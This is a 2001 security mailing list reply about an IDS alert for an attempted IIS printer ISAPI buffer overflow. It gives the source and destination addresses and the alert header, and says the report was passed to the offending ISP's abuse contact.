Security Incidents mailing list archives

Re: Attempted WEB-IIS printer attempt Buffer Overflow


From: Doug Nelson <nelson () clunix cl msu edu>
Date: Tue, 17 Jul 2001 11:15:05 -0400 (EDT)

Date of Attack:  Jul 14, 2001
Time of Attack: 09:00:38 am EDT

Source of Attack: 
IP Address: 198.109.163.170

Destination of Attack:
IP Address: 216.18.61.98
Port: 80
Protocol: TCP


Description: 
- Intruder attempted to access the printer ISAPI filter.

Link: http://www.whitehats.com/info/IDS533

The IP address in question belongs to AT&T Broadband and Information
Services in East Lansing.  I have passed your message on to
"abuse () tcimet net" for further action.

Doug Nelson                     nelson () msu edu
Network Manager                 Ph: (517) 353-2980
Computer Laboratory
Michigan State University


[**] WEB-IIS printer attempt [**]
Jul 14,01 09:00:38am    198.109.163.170:3265 -> 216.18.61.98:80
TTL: 46 TOS: 0x0        ID:1675
***AP*** Seq: 3550615295 Ack: 2075228853 Win: 32120



---
Jason Robertson                
Network Analyst            
jason () ifutureinc com    
http://www.astroadvice.com      



